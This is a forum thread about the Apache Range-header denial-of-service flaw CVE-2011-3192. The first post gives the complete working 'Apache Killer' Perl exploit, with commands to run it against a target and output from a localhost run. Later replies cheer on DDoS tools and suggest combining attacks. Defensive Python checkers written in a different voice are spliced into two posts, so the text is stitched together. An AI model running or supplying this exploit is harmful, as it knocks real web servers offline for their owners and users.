Apache DoS Vulnerability (CVE-2011-3192)
#1
Just FYI (many of you probably already know): there is a vulnerability in Apache HTTP Server 1.3.x and 2.x.x up to 2.2.19.

In the mitre.org database the vulnerability is named CVE-2011-3192.

This vulnerability exploits a weakness in how Apache httpd handles Range requests, which exhausts the server's CPU and memory.

The vulnerability has been patched by Apache.org with the release of version 2.2.20 on 31 August 2011.

Here is the script from Pastebin (sorry, I forgot to copy the link, just use your google-fu), called Apache Killer:
Code:
#!/usr/bin/perl

#Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
#Original by Kingcope
#Altered by W
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use threads;

sub usage
{
        print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
        print "Originally by Kingcope\n";
        print "Altered to use threads by W\n";
        print "Usage: $0 <attack> <host> [page=/] [threads=50]\n";
        print "Example: $0 YES www.example.com index.html 50\n";
        print "If attack is anything other than 'YES', then the tool will test and exit.\n";
}

sub testapache
{
        print "Testing for partial content exploit against $host$path...\n";

        my $sock = IO::Socket::INET->new(PeerAddr => $host,
                PeerPort => "80",
                Proto    => 'tcp') or die "Can't open socket to $host!\n";

        my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;

        my $x = <$sock>;
        if ($x =~ /Partial/)
        {
                print "Host: $host appears to be vulnerable to partial content DoS\n";
                return 1;
        } else {
                print "Host: $host appears to not be vulnerable, returned:\n$x";
                return 0;
        }
}

sub exploitserver
{
        my $sock = IO::Socket::INET->new(PeerAddr => $host,
                PeerPort => "80",
                Proto    => 'tcp') or return(0);
        print $sock $p;

        while(<$sock>)
        {
        }
        print ".";
}


if($#ARGV < 1)
{
        &usage && exit;
}

$real = ($ARGV[0] eq 'YES');
$host = $ARGV[1];
$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';
$numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;
$vuln = &testapache;

srand(time());
my $r = "";

for ($k=0;$k<1300;$k++)
{
        $r .= ",5-$k";
}

$p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
if($vuln && $real)
{
        my @threads;
        $|=1;

        print "Running partial content exploit against $host$path using $numthreads threads\n";
        for(my $n = 0; $n < $numthreads; $n++)
        {
                my $thr = async { while(1){ &exploitserver; } };
                push(@threads, $thr);
        }
        foreach(@threads)
        {
                $_->join();
                print($_);
        }
}


Usage:
1. to check whether the Apache web server is vulnerable or not
Code:
perl filename.pl www.target.com

2. to run the exploit
Code:
perl filename.pl YES www.target.com


This is what I tried on localhost on BT5 with Apache version 2.2.14:
Quote:root@bt:~/Programs# perl apache_killer.pl YES localhost
Testing for partial content exploit against localhost/...
Host: localhost appears to be vulnerable to partial content DoS
Running partial content exploit against localhost/ using 50 threads
...........................................................................................

The result:
Quote:root@bt:/pentest/web/nikto# top
top - 15:59:53 up 3:43, 6 users, load average: 16.15, 3.84, 1.55
Tasks: 188 total, 54 running, 134 sleeping, 0 stopped, 0 zombie
Cpu(s): 92.5%us, 6.8%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st
Mem: 3094072k total, 2748296k used, 345776k free, 59780k buffers
Swap: 1952764k total, 0k used, 1952764k free, 537448k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1753 root 20 0 1067m 787m 35m R 32 26.1 56:34.54 firefox-bin
1572 root 20 0 275m 71m 32m R 12 2.4 26:46.66 kwin
1433 root 19 -1 68768 53m 10m S 11 1.8 18:27.57 Xorg
1786 root 20 0 101m 21m 15m S 4 0.7 3:10.73 konsole
4329 www-data 20 0 49808 19m 1160 S 4 0.7 0:00.66 apache2
4328 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.61 apache2
3535 www-data 20 0 49808 19m 1160 R 3 0.7 0:04.61 apache2
3975 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.56 apache2
3981 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.50 apache2
4012 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.45 apache2
4333 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.54 apache2
4351 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.44 apache2
4364 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.43 apache2
4387 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.43 apache2
4020 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.41 apache2
4377 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.42 apache2
3494 www-data 20 0 49808 19m 1160 R 2 0.7 0:04.78 apache2
4026 www-data 20 0 49808 19m 1160 R 2 0.7 0:01.35 apache2
4325 www-data 20 0 49808 19m 1160 S 2 0.7 0:00.84 apache2

Look at Cpu(s): 92.5%us and Mem: 3094072k total, 2748296k used, 345776k free; also look at the apache2 services with different PIDs below them.

Our processor and RAM are driven to their maximum, and this will certainly cause the server to go out of service...

So update your Apache server right away :)

Hope this is useful
M

Source:

Whoa, why did my post come out so wide, lol.
How do I fix it? Sorry if it looks untidy...
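From the defender's side, the script above works only because the server accepts a Range header with more than a thousand overlapping byte ranges. The following Python check is an added example, not code from this thread or from the Apache project: it parses a Range header value and flags both of those features (too many ranges, overlapping ranges), which is the same idea the Apache fix applied server-side. The MAX_RANGES threshold of 200 and the sample requests are constructed for the example; 200 is chosen to mirror the default of the MaxRanges directive that Apache 2.2.21 later introduced.

```python
"""Range header sanity check in the spirit of the CVE-2011-3192 fix.

Added example, not from this thread or from Apache. Flags headers that
carry an excessive number of byte ranges or ranges that overlap.
"""
import re

MAX_RANGES = 200  # assumed threshold for this example (mirrors MaxRanges default)

# one byte-range-spec: "a-b", "a-" (open-ended) or "-b" (suffix)
_SPEC_RE = re.compile(r"^(\d*)-(\d*)$")


def split_range_specs(header_value):
    """Split 'bytes=a-b,c-d,...' into raw spec strings.

    Raises ValueError when the range unit is missing or is not 'bytes'.
    """
    unit, sep, rest = header_value.partition("=")
    if sep != "=" or unit.strip().lower() != "bytes":
        raise ValueError("unsupported or missing range unit")
    return [s.strip() for s in rest.split(",") if s.strip()]


def parse_spec(spec):
    """Parse one spec into (start, end).

    start is None for a suffix range ('-500'); end is None for an
    open-ended range ('500-'). Raises ValueError for anything that is
    not digits-digits with at least one side present.
    """
    m = _SPEC_RE.match(spec)
    if not m or (m.group(1) == "" and m.group(2) == ""):
        raise ValueError("malformed byte-range-spec: %r" % spec)
    start = int(m.group(1)) if m.group(1) else None
    end = int(m.group(2)) if m.group(2) else None
    return start, end


def has_overlap(ranges):
    """True if two satisfiable absolute ranges share at least one byte.

    Suffix ranges (start None) and inverted ranges (end < start), which a
    server ignores, are left out of the comparison.
    """
    absolute = [(s, e) for s, e in ranges
                if s is not None and (e is None or e >= s)]
    absolute.sort(key=lambda r: r[0])
    prev_end = -1
    for start, end in absolute:
        if start <= prev_end:
            return True
        prev_end = float("inf") if end is None else end
    return False


def classify_range_header(header_value, max_ranges=MAX_RANGES):
    """Return 'ok', 'too-many-ranges', 'overlapping' or 'malformed'.

    The count check runs before full parsing so a header with thousands
    of specs is rejected cheaply, whatever the specs contain.
    """
    try:
        specs = split_range_specs(header_value)
    except ValueError:
        return "malformed"
    if len(specs) > max_ranges:
        return "too-many-ranges"
    try:
        ranges = [parse_spec(s) for s in specs]
    except ValueError:
        return "malformed"
    if has_overlap(ranges):
        return "overlapping"
    return "ok"


def scan_headers(requests, max_ranges=MAX_RANGES):
    """Classify (client, headers-dict) pairs; returns (client, verdict)
    for every request that carries a Range header."""
    results = []
    for client, headers in requests:
        for name, value in headers.items():
            if name.lower() == "range":
                results.append((client, classify_range_header(value, max_ranges)))
    return results


# Constructed sample traffic: a resumed download, a suffix range, and a
# header of the same shape the script above builds (bytes=0-5,5-0,...,5-1299).
SAMPLE_REQUESTS = [
    ("10.0.0.1", {"Host": "www.example.com", "Range": "bytes=1000-"}),
    ("10.0.0.2", {"Host": "www.example.com", "Range": "bytes=-500"}),
    ("10.0.0.3", {"Host": "www.example.com",
                  "Range": "bytes=0-5" + "".join(",5-%d" % k for k in range(1300))}),
]

if __name__ == "__main__":
    for client, verdict in scan_headers(SAMPLE_REQUESTS):
        print(client, verdict)
```

The count check comes first on purpose: the cost of the attack comes from the server doing work per range, so the cheapest defence is to refuse the header before any per-range processing. Overlap detection catches the lower-volume variant where a few ranges repeatedly cover the same bytes.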

#2
OK, I've tidied it up for you. For pasting code just use a spoiler, it doesn't auto line-break.

As for DDoSing Apache, this tool is solid :P
http://forum.id-backtrack.com/showthread.php?tid=29

#3
(09-02-2011, 08:21 PM)cassaprodigy Wrote: OK, I've tidied it up for you. For pasting code just use a spoiler, it doesn't auto line-break.

As for DDoSing Apache, this tool is solid :P
http://forum.id-backtrack.com/showthread.php?tid=29

Wow, thanks a lot bro, sorry for the trouble :P

What would the result be if slowloris were combined with this tool? :D

#4
Does it apply to Apache Tomcat??

#5
I've never tried it bro, just try it and post the results here :)

#6
Lol.. I want to try it, but I'd feel bad for the admin, hehe :D

#7
Permission to learn!
Thanks Om Konspirasi!
root@nosetrave:~# ./plagiat.sh
English motherfucker, do you speak it ?
root@nosetrave:~#


#8
I want to ask: how do we tell whether a site uses Apache, PHP, MySQL? Because I once came across this:

Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at bla-bla.co.us port 80

And please also explain what the code above means...

#9
That server is running Apache version 2.2.11 (port 80).
The server is Unix-based and uses the plugins or mods below:

mod_ssl version 2.2.11
openssl version 0.9.8i
mod_apreq2 version 2.6.0
mod_perl 2.0.4

with support for the Perl and PHP versions below:
php 5.2.8
perl 5.10.0
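The banner quoted above is the Apache ServerSignature/Server string, and reading it by hand is exactly what the reply does. As an added example (not code from this thread), here is a small Python parser that splits such a banner into product/version pairs, the parenthesised platform comment, and the host/port footer, and then applies the version range post #1 gives for CVE-2011-3192 (1.3.x, and 2.x up to 2.2.19, fixed in 2.2.20). The function and variable names are my own; the only input is the banner quoted above plus a constructed banner with the version hidden.

```python
"""Parser for an Apache 'Server at ... port ...' banner.

Added example, not code from this thread or from Apache.
"""
import re

_FOOTER_RE = re.compile(r"\s*Server at (?P<host>\S+) port (?P<port>\d+)\s*$")
_TOKEN_RE = re.compile(r"\([^)]*\)|\S+")  # a (comment) or a whitespace-free token


def version_tuple(version):
    """'2.2.11' -> (2, 2, 11). Non-numeric parts such as 'v' or the 'i' in
    '0.9.8i' are dropped, which is enough for ordering here."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def parse_server_banner(banner):
    """Return a dict with 'components' ([(product, version-or-None), ...]),
    'comments' (text inside parentheses) and 'host'/'port' from the footer."""
    m = _FOOTER_RE.search(banner)
    host, port = (m.group("host"), int(m.group("port"))) if m else (None, None)
    head = banner[:m.start()] if m else banner
    components, comments = [], []
    for tok in _TOKEN_RE.findall(head):
        if tok.startswith("("):
            comments.append(tok[1:-1])
        elif "/" in tok:
            product, _, version = tok.rpartition("/")
            components.append((product, version.lstrip("v")))
        else:
            # e.g. a bare 'Apache' when ServerTokens hides the version
            components.append((tok, None))
    return {"components": components, "comments": comments,
            "host": host, "port": port}


def apache_version(parsed):
    """Version string of the Apache component, or None if absent or hidden."""
    for product, version in parsed["components"]:
        if product == "Apache":
            return version
    return None


def in_cve_2011_3192_range(version):
    """True/False for a known Apache version, None when it cannot be judged.
    Range as given in post #1: 1.3.x, and 2.x before 2.2.20."""
    if not version:
        return None
    v = version_tuple(version)
    if v[:2] == (1, 3):
        return True
    if v[:1] == (2,) and v < (2, 2, 20):
        return True
    return False


# The banner quoted in the question above.
BANNER = ("Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 "
          "mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 "
          "Server at bla-bla.co.us port 80")

if __name__ == "__main__":
    info = parse_server_banner(BANNER)
    for product, version in info["components"]:
        print("%-22s %s" % (product, version or "(version hidden)"))
    print("platform:", info["comments"], "host:", info["host"], "port:", info["port"])
    print("Apache version in CVE-2011-3192 range:",
          in_cve_2011_3192_range(apache_version(info)))
```

Note that the `mod_apreq2-20051231/2.6.0` token keeps its build date inside the product name, since the banner itself does not separate the two; and a banner that hides the version (ServerTokens Prod) yields None rather than a false "not affected", which is the honest answer when triaging from a banner alone.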


#10
Thanks to om cassa for helping with the answer :)

If the server uses another web server, something other than Apache will show up, bro, e.g. IIS, nginx, etc.





